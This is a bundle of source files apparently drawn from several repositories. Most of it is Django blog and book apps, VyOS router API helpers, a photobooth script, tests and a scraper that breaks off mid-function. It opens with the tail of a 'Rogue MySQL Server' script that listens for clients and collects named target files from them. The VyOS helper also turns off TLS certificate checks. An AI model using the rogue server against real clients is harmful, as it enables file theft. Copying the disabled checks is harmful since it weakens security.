try:
self.bind(('', PORT))
except socket.error:
exit()
self.listen(5)
def handle_accept(self):
pair = self.accept()
if pair is not None:
log.info('Data received from: %s' % pair[1][0])
print('[+] Data received from %s' % pair[1][0])
tmp = http_request_handler(pair)
if __name__ == '__main__':
filelist = list()
obtained = set()
failCount = 0
prevFilename = ''
args = parser.parse_args()
if args.d:
DEBUG = args.d
if args.l:
try:
filelist += filter(None, open(args.l, 'r').read().split('\n'))
except IOError:
print('[-] Error: List file not found')
sys.exit(1)
else:
if not args.f:
print('[-] Error: No files specified')
sys.exit(1)
else:
filelist.append(args.f)
if args.p:
PORT = args.p
if args.a:
ATTEMPTS = args.a
if args.v:
VERBOSE = args.v
if not os.path.exists(SAVE_FOLDER):
os.mkdir(SAVE_FOLDER)
filelist.append('')
print('Rogue MySQL Server')
print('[+] Target files:')
for file in filelist:
if file != '': print('\t' + file)
print('[+] Starting listener on port ' + str(PORT) + '... Ctrl+C to stop\n')
listener = mysql_listener()
signal.signal(signal.SIGINT, handler)
asyncore.loop()
``` |
{
"source": "jibaku/blogging",
"score": 2
} |
#### File: blogging/blogging/actions.py
```python
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext
from blogging.models import Post
# Post Actions
def make_published(modeladmin, request, queryset):
"""Mark the given posts as published."""
count = queryset.update(status=Post.PUBLISHED)
message = ungettext(
u'%(count)d post was successfully marked as published.',
u'%(count)d posts were successfully marked as published',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_published.short_description = _(u"Mark selected stories as published")
def make_draft(modeladmin, request, queryset):
"""Mark the given posts as draft."""
count = queryset.update(status=Post.DRAFT)
message = ungettext(
u'%(count)d post was successfully marked as draft.',
u'%(count)d posts were successfully marked as draft',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_draft.short_description = _(u"Mark selected stories as draft")
def make_selected(modeladmin, request, queryset):
"""Mark the given posts as selected."""
count = queryset.update(selected=True)
message = ungettext(
u'%(count)d post was successfully marked as selected.',
u'%(count)d posts were successfully marked as selected',
count
) % {'count': count}
modeladmin.message_user(request, message)
make_selected.short_description = _(u"Mark selected stories as selected")
def make_post_type_action(key, name):
"""Create Post action to update post_type."""
func_name = 'define_as_{}'.format(name.lower())
def action_f(modeladmin, req, qset):
count = qset.update(post_type=key)
message = ungettext(
u'%(count)d post was successfully marked as %(name)s.',
u'%(count)d posts were successfully marked as %(name)s',
count
) % {'count': count, 'name': name}
modeladmin.message_user(req, message)
action = action_f
action.__name__ = func_name
return (func_name, (action, func_name, "define selected as %s" % name))
# Category Actions
def update_counters(modeladmin, request, queryset):
"""Update the counters for the given categories."""
count = 0
for category in queryset:
category.update_counters()
count += 1
message = ungettext(
u'%(count)d category has been updated.',
u'%(count)d categories had been updated.',
count
) % {'count': count}
modeladmin.message_user(request, message)
update_counters.short_description = _(u"Update categories counters")
```
#### File: blogging/blogging/admin.py
```python
from collections import OrderedDict
from django.contrib import admin
from blogging.actions import (make_draft, make_post_type_action,
make_published, make_selected, update_counters)
from blogging.models import Category, Picture, Post
from blogging.settings import conf
@admin.register(Picture)
class PictureAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("name",)}
list_display = (
'name', 'site', 'description', 'image',
)
list_filter = ('site',)
search_fields = ('name', 'description')
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("name",)}
list_display = (
'name', 'site', 'visible_posts_count', 'all_posts_count',
)
list_filter = ('site',)
search_fields = ('name',)
actions = [update_counters, ]
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = (
'title', 'author', 'status', 'published_on', 'selected', 'post_type',
'site'
)
date_hierarchy = 'published_on'
prepopulated_fields = {"slug": ("title",)}
search_fields = ('excerpt', 'content', 'item__title')
filter_horizontal = ["categories"]
def get_actions(self, request):
actions_list = [
('make_published', (make_published, 'make_published', make_published.short_description)),
('make_draft', (make_draft, 'make_draft', make_draft.short_description)),
('make_selected', (make_selected, 'make_selected', make_selected.short_description)),
]
for k, v in Post.CONTENT_TYPE_CHOICES:
actions_list.append(make_post_type_action(k, v))
return OrderedDict(actions_list)
def get_list_filter(self, request):
if conf.get('POST_LIST_FILTER_BY_AUTHOR', True):
return ['site', 'author', 'status', 'selected', 'categories']
else:
return ['site', 'status', 'selected', 'categories']
def get_changeform_initial_data(self, request):
return {'author': request.user.id}
def formfield_for_manytomany(self, db_field, request, **kwargs):
"""
Monkey patching the form field for categories.
TODO: Create a widget to manage it more easily
"""
field = super(PostAdmin, self).formfield_for_manytomany(db_field, request, **kwargs)
field.queryset = field.queryset.order_by('site__domain')
field.label_from_instance = lambda obj: "{site!s} - {name!s}".format(**{
'site': obj.site, 'name': obj.name
})
return field
```
#### File: blogging/blogging/context_processor.py
```python
from blogging.models import Category, Post
from django.conf import settings
def categories(request):
"""Return the site categories."""
categories = Category.availables.all()
return {'categories': categories}
def latest_posts(request):
"""Return the latest posts."""
latest_items = Post.objects.published(site_id=settings.SITE_ID)[:5]
return {'latest_posts': latest_items}
def month_with_items(request):
"""Return the latest posts."""
months = Post.objects.published(site_id=settings.SITE_ID).dates('published_on', 'month')
return {'month_with_items': months}
def selected_items(request):
"""Return a list of selected items."""
selected_items = Post.objects.published(site_id=settings.SITE_ID).filter(selected=True)
return {'selected_items': selected_items}
```
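These context processors only take effect once they are registered in the project's template settings. A minimal sketch, assuming the app is importable as `blogging` and a standard Django `TEMPLATES` configuration; the non-blogging entries are the usual defaults.
```python
# settings.py (sketch): register the blogging context processors so every
# template gets `categories`, `latest_posts`, `month_with_items` and
# `selected_items` in its context.
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                # additions for this app:
                "blogging.context_processor.categories",
                "blogging.context_processor.latest_posts",
                "blogging.context_processor.month_with_items",
                "blogging.context_processor.selected_items",
            ],
        },
    },
]
```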
#### File: blogging/blogging/feeds.py
```python
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext as _
from blogging.models import Category, Post
# TODO: move it to the new blogging conf
description_template = getattr(settings, 'BLOGGING_FEED_DESCRIPTION_TEMPLATE', "blogging/feeds/description.html")
title_template = getattr(settings, 'BLOGGING_FEED_TITLE_TEMPLATE', "blogging/feeds/title.html")
feed_title = getattr(settings, 'BLOGGING_FEED_TITLE', None)
class LatestEntriesByCategory(Feed):
description_template = description_template
title_template = title_template
def get_object(self, request, category_slug):
site = Site.objects.get_current()
return get_object_or_404(Category, slug=category_slug, site=site)
def title(self, category):
return category.name
def link(self, obj):
return obj.get_absolute_url()
def description(self, category):
return _(u"Latest published items from %s") % category
def items(self, category):
return Post.objects.published(site_id=settings.SITE_ID).filter(categories=category)[:20]
class LatestEntries(Feed):
description_template = description_template
title_template = title_template
link = "/"
description = _(u"Latest published entries")
def title(self):
return feed_title or _(u"Latest entries")
def items(self):
return Post.objects.published(site_id=settings.SITE_ID)[:20]
def item_pubdate(self, item):
return item.published_on
def item_author_name(self, item):
return item.author.get_full_name()
def item_categories(self, item):
return item.categories.all()
``` |
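The two feed classes are wired up like ordinary views by instantiating them in a URLconf. A minimal sketch, assuming Django ≥ 2.0 for `path()`; the URL prefixes and names are hypothetical, and only the `category_slug` keyword is required by `LatestEntriesByCategory.get_object()`.
```python
# urls.py (sketch): expose the syndication feeds defined above
from django.urls import path

from blogging.feeds import LatestEntries, LatestEntriesByCategory

urlpatterns = [
    path("feeds/latest/", LatestEntries(), name="feed-latest"),
    path(
        "feeds/category/<slug:category_slug>/",
        LatestEntriesByCategory(),
        name="feed-category",
    ),
]
```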
{
"source": "jibaku/books",
"score": 2
} |
#### File: books/books/models.py
```python
from __future__ import unicode_literals
from django.contrib.sites.managers import CurrentSiteManager
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import Q
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
import datetime
@python_2_unicode_compatible
class Editor(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField(unique=True)
class Meta:
verbose_name = _('Editor')
verbose_name_plural = _('Editors')
def __str__(self):
return self.name
def cover_filename(instance, filename):
return "books/%s.jpg" % instance.slug
class BookManager(models.Manager):
def published(self):
now = datetime.datetime.now()
queryset = self.filter(validated=True)
queryset = queryset.filter(start_publication_on__lte=now)
q = (
Q(end_publication_on__isnull=False)
& Q(end_publication_on__gt=now)
) | Q(end_publication_on__isnull=True)
queryset = queryset.filter(q)
return queryset
class SiteBookManager(CurrentSiteManager, BookManager):
pass
@python_2_unicode_compatible
class Book(models.Model):
site = models.ForeignKey(Site)
validated = models.BooleanField(default=False)
start_publication_on = models.DateTimeField(default=datetime.datetime.now)
end_publication_on = models.DateTimeField(blank=True, null=True)
lang = models.CharField(max_length=5)
title = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, db_index=True)
authors = models.CharField(max_length=200)
editor = models.ForeignKey(Editor)
url = models.URLField(blank=True)
affiliate_url = models.URLField(blank=True)
isbn_10 = models.CharField(max_length=10, null=True, blank=True)
isbn_13 = models.CharField(max_length=13, null=True, blank=True)
asin = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField()
cover = models.ImageField(upload_to=cover_filename, blank=True)
objects = BookManager()
on_site = SiteBookManager()
class Meta:
verbose_name = _('Book')
verbose_name_plural = _('Books')
def __str__(self):
return self.title
```
#### File: books/books/views.py
```python
from django.views.generic import ListView
from django.views.generic import DetailView
from books.models import Book
class BooksList(ListView):
def get_queryset(self):
return Book.on_site.published()
class BookDetail(DetailView):
def get_queryset(self):
return Book.on_site.published()
``` |
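A minimal URLconf sketch for the two class-based views. The `ForeignKey` fields without `on_delete` suggest a Django 1.x project, so the old-style `url()` helper is used here; the URL names are hypothetical. `DetailView` looks the book up by the captured `slug`, which matches `Book.slug`, and the default templates would be `books/book_list.html` and `books/book_detail.html`.
```python
# urls.py (sketch): hook up the list and detail views
from django.conf.urls import url

from books.views import BookDetail, BooksList

urlpatterns = [
    url(r"^books/$", BooksList.as_view(), name="book-list"),
    url(r"^books/(?P<slug>[-\w]+)/$", BookDetail.as_view(), name="book-detail"),
]
```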
{
"source": "jibaku/django-textprocessor",
"score": 2
} |
#### File: textprocessor/templatetags/text_enhancer.py
```python
import re
import markdown
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
from django import template
register = template.Library()
@register.filter
@stringfilter
def twitter_username(value):
    """Add a link to twitter for the twitter user referenced in a string
>>> twitter_username("Hello, @ev")
u'Hello, <a href="http://twitter.com/ev">@ev</a>'
"""
def repl(m):
return '<a href="http://twitter.com/%(username)s">@%(username)s</a>' % {'username': m.group(1)}
return re.sub(r"@(\w+)", repl, value)
@register.filter(name='markdown')
@stringfilter
def markdown_filter(value):
html = markdown.markdown(value, output_format="html5")
return mark_safe(html)
``` |
{
"source": "jibaku/photobooth",
"score": 3
} |
#### File: jibaku/photobooth/booth-pygame.py
```python
import time
import pygame
from pygame.locals import K_ESCAPE, K_SPACE, QUIT, USEREVENT
COUNTDOWN_DELAY = 4
def timerFunc(countdown, background):
print("Timer CallBack", time.time())
print(countdown)
print("--")
# Display some text
font = pygame.font.Font(None, 36)
text = font.render(str(countdown), 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
textpos.centery = background.get_rect().centery
background.blit(text, textpos)
if countdown == 0:
print("SHOOT")
def top_text(background):
# Display some text
font = pygame.font.Font(None, 36)
text = font.render("space to shoot / esc to quit", 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
background.blit(text, textpos)
def main():
pygame.init()
countdown = COUNTDOWN_DELAY
stop_photobooth = False
screen = pygame.display.set_mode((400, 300))
pygame.display.set_caption('Photobooth')
# Fill background
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((30, 250, 120))
top_text(background)
# Blit everything to the screen
screen.blit(background, (0, 0))
pygame.display.flip()
while not stop_photobooth:
background.fill((30, 250, 120))
top_text(background)
for event in pygame.event.get():
# any other key event input
if event.type == QUIT:
stop_photobooth = True
if event.type == USEREVENT+1:
if countdown == -1:
pygame.time.set_timer(USEREVENT+1, 0)
countdown = COUNTDOWN_DELAY
else:
                    timerFunc(countdown, background) #calling the function whenever we get a timer event.
countdown -= 1
# get key current state
keys = pygame.key.get_pressed()
if keys[K_SPACE]:
pygame.time.set_timer(USEREVENT+1, 1000)
elif keys[K_ESCAPE]:
print("quit")
stop_photobooth = True
screen.blit(background, (0, 0))
pygame.display.flip()
if __name__ == "__main__":
main()
``` |
{
"source": "jibaku/python-opengraph",
"score": 3
} |
#### File: python-opengraph/tests/test_opengraph.py
```python
from __future__ import absolute_import, unicode_literals
from unittest import TestCase
from opengraph import OpenGraph
from threading import local
import responses
data = local()
class TestOpenGraph(TestCase):
def setUp(self): # NOQA
self.test_document = """
<html><head>
<meta property="og:title" content="Test title">
</head><body></body></html>
"""
@responses.activate
def test_loading_from_url(self):
url = 'http://foo.bar.com/'
responses.add(
responses.GET, url, body=self.test_document,
status=200, content_type='text/html')
og = OpenGraph(url=url)
self.assertEqual(og.title, 'Test title')
def test_get_attr(self):
og = OpenGraph(html=self.test_document)
self.assertEqual(og.title, 'Test title')
with self.assertRaises(AttributeError):
og.attribute_does_not_exist
def test_contains(self):
og = OpenGraph(html=self.test_document)
self.assertIn('title', og)
def test_str_repr(self):
og = OpenGraph(html=self.test_document)
text_of_data = og.__data__.__str__()
self.assertEqual(str(og), text_of_data)
@responses.activate
    def test_loading_from_url_with_useragent(self):
def http_callback(request):
# Ugly, but using thread locals in order to capture the request
# headers in the callback, to assert that it's being set correctly
data.headers = request.headers
return (200, {'content-type': 'text/html'}, self.test_document)
url = 'http://foo.bar.com/'
useragent = 'python-opengraph/0.0'
responses.add_callback(
responses.GET, url, callback=http_callback,
content_type='text/html')
og = OpenGraph(url=url, useragent=useragent)
headers = data.headers
self.assertEqual(og.title, 'Test title')
self.assertEqual(headers['user-agent'], useragent)
``` |
{
"source": "jibaku/vycontrol",
"score": 2
} |
#### File: vycontrol/openvpn/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.shortcuts import redirect
from django.conf import settings
from django.urls import reverse
import vyos
def index(request):
if not request.user.is_authenticated:
return redirect('%s?next=%s' % (reverse('registration-login'), request.path))
all_instances = vyos.instance_getall()
hostname_default = vyos.get_hostname_prefered(request)
template = loader.get_template('openvpn/list.html')
context = {
'instances': all_instances,
'hostname_default': hostname_default,
}
return HttpResponse(template.render(context, request))
```
#### File: vycontrol/vycontrol/vyos.py
```python
import requests
import json
import pprint
import sys
from config.models import Instance
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
import perms
def instance_getall(*args, **kwargs):
return perms.instance_getall(*args, **kwargs)
def get_hostname_prefered(*args, **kwargs):
return perms.get_hostname_prefered(*args, **kwargs)
def instance_getall_by_group(*args, **kwargs):
return perms.instance_getall_by_group(*args, **kwargs)
def repvar(s):
return s.replace("-", "_")
def get_url(hostname):
# permcheck
instance = Instance.objects.get(hostname=hostname)
if instance.https == True:
protocol = "https"
else:
protocol = "http"
if (instance.port == None):
instance.port = 443
url = protocol + "://" + instance.hostname + ":" + str(instance.port)
return url
def get_url_manage(hostname):
url = get_url(hostname) + '/config-file'
return url
def get_url_configure(hostname):
url = get_url(hostname) + '/configure'
return url
def get_url_show(hostname):
url = get_url(hostname) + '/show'
return url
def get_url_retrieve(hostname):
url = get_url(hostname) + '/retrieve'
return url
def get_key(hostname):
# permcheck
instance = Instance.objects.get(hostname=hostname)
return instance.key
def api(type, hostname, cmd):
if type == "retrieve":
url = get_url_retrieve(hostname)
elif type == "manage":
url = get_url_manage(hostname)
elif type == "configure":
url = get_url_configure(hostname)
elif type == "show":
url = get_url_show(hostname)
else:
return False
pprint.pprint(cmd)
print(json.dumps(cmd))
post = {'key': get_key(hostname), 'data': json.dumps(cmd)}
print(post)
try:
resp = requests.post(url, verify=False, data=post, timeout=10)
except requests.exceptions.ConnectionError:
return False
print(resp.status_code)
pprint.pprint(resp)
pprint.pprint(resp.json())
if resp.status_code != 200:
# This means something went wrong.
#raise ApiError('POST /tasks/ {}'.format(resp.status_code))
return False
#for todo_item in resp.json():
#print('{} {}'.format(todo_item['id'], todo_item['summary']))
result1 = resp.json()
print(result1['data'])
#result2 = json.loads(result1['data'])
pprint.pprint(result1)
return result1['data']
def api_get(hostname, cmd):
return api('retrieve', hostname, cmd)
def api_show(hostname, cmd):
return api('show', hostname, cmd)
def api_set(hostname, cmd):
return api('configure', hostname, cmd)
def conntry(hostname):
cmd = {"op": "showConfig", "path": ["interfaces"]}
print(json.dumps(cmd))
post = {'key': get_key(hostname), 'data': json.dumps(cmd)}
print(post)
print(get_url_retrieve(hostname))
try:
resp = requests.post(get_url_retrieve(hostname), verify=False, data=post, timeout=10)
except requests.exceptions.ConnectionError:
return False
print(resp.status_code)
if (resp.status_code == 200):
return True
pprint.pprint(resp)
pprint.pprint(resp.json())
return False
def get_firewall_all(hostname):
cmd = {"op": "showConfig", "path": ["firewall"]}
firewall_list = api_get(hostname, cmd)
nfirewall_list = {}
for f in firewall_list:
s = repvar(f)
nfirewall_list[s] = firewall_list[f]
nfirewall_list[f] = firewall_list[f]
return nfirewall_list
def get_interfaces(hostname):
cmd = {"op": "showConfig", "path": ["interfaces"]}
result1 = api_get(hostname, cmd)
return result1
def get_interfaces_all_names(hostname):
interfaces = get_interfaces(hostname)
all_names = []
for itype in interfaces:
for iname in interfaces[itype]:
all_names.append({
'interface_name': iname,
'type': itype
})
if 'vif' in interfaces[itype][iname]:
for vif in interfaces[itype][iname]['vif']:
all_names.append({
'interface_name': iname,
'type': itype,
'vif': vif
})
return all_names
def get_interface(interface_type, interface_name, hostname):
cmd = {"op": "showConfig", "path": ["interfaces", interface_type, interface_name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall(hostname, name):
cmd = {"op": "showConfig", "path": ["firewall", "name", name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_rule(hostname, name, rulenumber):
cmd = {"op": "showConfig", "path": ["firewall", "name", name, "rule", rulenumber]}
result1 = api_get(hostname, cmd)
return result1
def set_config(hostname, cmd):
#cmd = {"op": "set", "path": ["interface", interface_type, interface_name, "firewall", direction, "name", firewall_name]}
result1 = api_set(hostname, cmd)
return result1
def insert_firewall_rules(hostname, cmd):
pprint.pprint(cmd)
result1 = api_set(hostname, cmd)
return result1
def get_route_static(hostname):
cmd = {"op": "showConfig", "path": ["protocols","static","route"]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_syncookies_enable(hostname):
cmd = {"op": "set", "path": ["firewall","syn-cookies",'enable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_syncookies_disable(hostname):
cmd = {"op": "set", "path": ["firewall","syn-cookies",'disable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_allping_enable(hostname):
cmd = {"op": "set", "path": ["firewall","all-ping",'enable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_allping_disable(hostname):
cmd = {"op": "set", "path": ["firewall","all-ping",'disable']}
result1 = api_set(hostname, cmd)
return result1
def get_firewall_portgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","port-group"]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_portgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'port-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'port-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_add(hostname, group_name, port):
cmd = {"op": "set", "path": ["firewall","group",'port-group', group_name, "port", port]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_delete_port(hostname, group_name, port):
cmd = {"op": "delete", "path": ["firewall","group",'port-group', group_name, "port", port]}
result1 = api_set(hostname, cmd)
return result1
def get_firewall_addressgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","address-group"]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_networkgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","network-group"]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_addressgroup_one(hostname, group_name):
cmd = {"op": "showConfig", "path": ["firewall","group","address-group", group_name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_networkgroup_one(hostname, group_name):
cmd = {"op": "showConfig", "path": ["firewall","group","network-group", group_name]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_networkgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_add(hostname, group_name, address):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "address", address]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'address-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'network-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_rangeadd(hostname, group_name, address_start, address_end):
address = str(address_start) + "-" + str(address_end)
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "address", address]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_add(hostname, group_name, network):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "network", network]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def delete_route_static(hostname, subnet, nexthop):
#cmd = {"op": "delete", "path": ["protocols","static","route", subnet, "next-hop", nexthop]}
cmd = {"op": "delete", "path": ["protocols","static","route", subnet]}
result1 = api_set(hostname, cmd)
return result1
def delete_route_rule(hostname, firewall_name, rule_name):
cmd = {"op": "delete", "path": ["firewall", "name", firewall_name, "rule", rule_name]}
result1 = api_set(hostname, cmd)
return result1
def delete_firewall(hostname, name):
cmd = {"op": "delete", "path": ["firewall","name", name]}
result1 = api_set(hostname, cmd)
return result1
def ip_route(hostname):
cmd = {"op": "show", "path": ["ip","route"]}
result1 = api_show(hostname, cmd)
return result1
```
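Every helper above reduces to a single POST against the VyOS HTTP API with the instance key and a JSON-encoded command. A minimal sketch of how the wrappers might be called, assuming an `Instance` row with this (hypothetical) hostname and a valid API key already exists.
```python
# sketch: reading and changing firewall state through the helpers above
import vyos

hostname = "edge-router-1"  # hypothetical Instance.hostname

# read side: showConfig commands go through api_get() -> POST <url>/retrieve
firewalls = vyos.get_firewall_all(hostname)
static_routes = vyos.get_route_static(hostname)

# write side: set/delete commands go through api_set() -> POST <url>/configure
vyos.set_firewall_portgroup_description(hostname, "web-ports", "HTTP and HTTPS")
vyos.set_firewall_portgroup_add(hostname, "web-ports", "443")
```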
#### File: vycontrol/wanlb/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.shortcuts import redirect
import vyos
def index(request):
all_instances = vyos.instance_getall()
hostname_default = vyos.get_hostname_prefered(request)
template = loader.get_template('wanlb/list.html')
context = {
'instances': all_instances,
'hostname_default': hostname_default,
}
return HttpResponse(template.render(context, request))
``` |
{
"source": "jibanCat/DigitalHumanities",
"score": 3
} |
#### File: DigitalHumanities/Han-Ji/Book.py
```python
from collections import defaultdict, Counter
### WHY "defaultdict", INSTEAD OF THE REGULAR "dict" FUNCTION? Because defaultdict(list) gives every missing key an empty list automatically, so author_bag can be appended to without key checks.
from datetime import datetime
from bs4 import BeautifulSoup
import bs4
from urllib import request
import urllib
import time
import random
import re
import os, sys
import glob
import logging
import pandas as pd
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import HtmlLexer
# logging information
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
class Book:
"""Han-Ji '<http://hanchi.ihp.sinica.edu.tw/ihp/hanji.htm>'_ Dataset.
Attributes:
flat_bodies (list): a list containing all htmls
flat_passages (list): a list containing the text of all passages (i.e., every individual piece in a book). Users should define their own methods to organize the passages.
flat_heads (list): a list containing all the text of the heads (i.e., the metadata at the top of each individual piece, like title and author). Users should define their own methods to organize the heads.
flat_meta (list): a list containing all metadata (dictionary) extracted from bookmarks. User should define their own methods to extract metadata.
paths (list): a list of paths extracted from the "bookmark" provided in the database. e.g., 集/總集/文選/卷第二十七 詩戊之一/樂府上/古樂府三首/飲馬長城窟行(P.1277)
Args:
bookname (string): the name of the book, default = ''
date (string): the date you collected the book, default = None
creator (string): the name of the creator who created the instance
Methods:
fetch_data(URL): fetch book bs4 obj from a start page URL of a Book in Han-Ji
extract_paths(): extract paths from bookmark in self.flat_bodies list and append paths to self.paths
write_htmls(path): write data into htmls on the disk in path
load_htmls(path): load data from htmls on the disk in path
        char_word_counts(char, limits=(1,4)): count the number of occurrences of phrases attached to a certain character
        extract_rare_chars(driver_path, normalization=True): extract rare chars in every passage. Note that this function would run for a long time.
write_rare_chars(): writing self.flat_rare_chars to `{bookname}_rare_char.json`
update_rare_chars(): replace rare char based on `{bookname}_rare_char.json`
"""
def __init__(self, bookname='', date=None, creator=None):
self.flat_bodies = []
self.flat_passages = []
self.flat_heads = []
self.flat_meta = []
self.paths = []
self.author_bag = defaultdict(list)
self.bookname = bookname
try:
self.date = datetime.strptime(date, '%Y-%m-%d')
except (TypeError,AttributeError,ValueError) as e:
logging.warning("No datetime input provided!")
self.date = ""
self.creator = creator
self.description_dataframe = self._description_dataframe()
def _highlight(self, html_code):
from IPython.display import HTML
formatter = HtmlFormatter(linenos=False, cssclass="source")
html_highlight = highlight(html_code, HtmlLexer(), formatter)
css_style = formatter.get_style_defs()
html_template = """<style>
{}
</style>
{}
""".format(css_style, html_highlight)
return HTML(html_template)
def __getitem__(self, index):
'''
Args:
index (int): Index
Returns:
bs4 html object in the flat_bodies
'''
return self._highlight(
self._pretty_html(
self.flat_bodies[index]
)
)
def __len__(self):
return len(self.flat_bodies)
def _description_dataframe(self):
types = ["meta", "path", "passages",]
variables = ["flat_meta", "paths", "flat_passages",]
methods = ["self.extract_meta", "self.extract_paths", "self.extract_passages"]
current_lengths = [len(self.flat_meta), len(self.paths), len(self.flat_passages)]
df = pd.DataFrame([types, variables, methods, current_lengths]).T
df.columns = ['type', 'variable', 'method', 'current_length']
return df
def __repr__(self):
self.description_dataframe = self._description_dataframe()
description = self.description_dataframe.to_string()
return description
def pretty_print(self, index, highlight=None):
"""pretty print the html source page in a Jupyter notebook cell output"""
from IPython.display import HTML, display
pretty_html_string = self._pretty_html( self.flat_bodies[index] )
if highlight:
pretty_html_string = re.sub(
r"({})".format(highlight),
r'<font style="color: k; background-color: #ffff42">\1</font>',
pretty_html_string
)
return display(HTML(pretty_html_string))
def _pretty_html(self, soup):
"""cut off irrelevant content, such as side columns in the webpage, from the Han-Ji HTML source page.
This procedure aims to save memory for the computer."""
span_id_fontstyle = str(soup.find("span", {"id": "fontstyle"}))
path = str(soup.find('a', attrs={'class', 'gobookmark'}))
HTML_string = """<html>
<body>
{}
</body>
</html>
""".format("{}\n\t{}".format(path, span_id_fontstyle))
return HTML_string
def fetch_data(self, URL, pages_limit=10000, print_bookmark=False, html_cutoff=False,
BASE_URL='http://hanchi.ihp.sinica.edu.tw/ihpc/', sleep_range=(1, 3)):
'''fetch book bs4 obj from a start page URL of a Book in Han-Ji
Args:
URL (string): the start page url from han-ji website
            pages_limit (int): the limit of next pages you can scrape. default = 10000
            print_bookmark (bool): print the bookmark while fetching the data. default = False
            html_cutoff (bool): cut off the irrelevant side column and tags in Han-Ji raw html files,
to save memory usage.
'''
for i in range(pages_limit):
# use urllib.request to get the html content of the website
req = request.Request(URL, headers={'User-Agent': 'Mozilla/5.0'})
page = request.urlopen(req)
try:
soup = BeautifulSoup(page, 'lxml')
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
soup = BeautifulSoup(page, "html5lib")
# show information on the screen
if print_bookmark == True:
logging.info("Start fetching {}. {}/{} epoch.".format(
soup.find('a', attrs={'class', 'gobookmark'}).text, i + 1, pages_limit))
else:
logging.info("Start fetching {}. {}/{} epoch.".format(URL, i + 1, pages_limit))
# check if the content is the same as previous page
### ? -> Response: this line is an ad-hoc solution for dealing with the first page while scraping. There must be a better way to do it.
if i > 0:
buffer = self.flat_bodies[-1].find_all('div', attrs={'style': True})
else:
# use a dummy list for the buffer for the first page
buffer = ['dummy']
# if the first and last elements in the buffer are the same as current page
# delete page and save the current page.
### GOOD SOLUTION, BUT ARE WE SURE THERE ARE NO HIDDEN TRAPS IN USING THIS RULE? COULD TWO CONSECUTIVE BUT DIFFERENT POEMS HAVE THE SAME START AND END WORD?
### Response: the comparison here is for end and start sentences of a poem.
            ### It's quite unlikely two poems have the same start and end sentences, right?
if (buffer[-1] ==
soup.find_all('div', attrs={'style': True})[-1]) and (
buffer[0] ==
soup.find_all('div', attrs={'style': True})[0]):
logging.warning("This page is the same as the previous one, discard previous one and store the new one.")
if html_cutoff == True:
try:
